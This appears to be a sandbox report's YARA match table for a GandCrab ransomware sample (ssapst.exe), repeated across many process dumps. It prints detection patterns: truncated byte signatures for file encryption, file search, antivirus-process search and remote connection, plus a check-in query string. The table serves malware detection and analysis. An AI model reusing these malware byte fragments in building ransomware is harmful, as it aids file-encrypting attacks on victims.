25.2.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
25.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
25.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
25.2.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
25.2.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
25.2.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
19.0.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
19.0.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
19.0.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
19.0.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
19.0.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
19.0.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
17.2.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
17.2.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
17.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
17.2.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
17.2.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
17.2.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
4.3.ssapst.exe.38c0000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
4.3.ssapst.exe.38c0000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
4.3.ssapst.exe.38c0000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
4.3.ssapst.exe.38c0000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
4.3.ssapst.exe.38c0000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
4.3.ssapst.exe.38c0000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
30.0.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
30.0.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
30.0.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
30.0.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
30.0.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
30.0.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
22.0.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
22.0.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
22.0.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
22.0.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
22.0.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
22.0.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
8.3.ssapst.exe.30f0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
8.3.ssapst.exe.30f0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
8.3.ssapst.exe.30f0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
8.3.ssapst.exe.30f0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
8.3.ssapst.exe.30f0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
8.3.ssapst.exe.30f0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
2.3.ssapst.exe.3640000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
2.3.ssapst.exe.3640000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
2.3.ssapst.exe.3640000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
2.3.ssapst.exe.3640000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
2.3.ssapst.exe.3640000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
2.3.ssapst.exe.3640000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
14.3.ssapst.exe.3730000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
14.3.ssapst.exe.3730000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
14.3.ssapst.exe.3730000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
14.3.ssapst.exe.3730000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
14.3.ssapst.exe.3730000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
14.3.ssapst.exe.3730000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
26.3.ssapst.exe.3830000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
26.3.ssapst.exe.3830000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
26.3.ssapst.exe.3830000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
26.3.ssapst.exe.3830000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
26.3.ssapst.exe.3830000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
26.3.ssapst.exe.3830000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
8.3.ssapst.exe.30f0000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
8.3.ssapst.exe.30f0000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
8.3.ssapst.exe.30f0000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
8.3.ssapst.exe.30f0000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
8.3.ssapst.exe.30f0000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
8.3.ssapst.exe.30f0000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 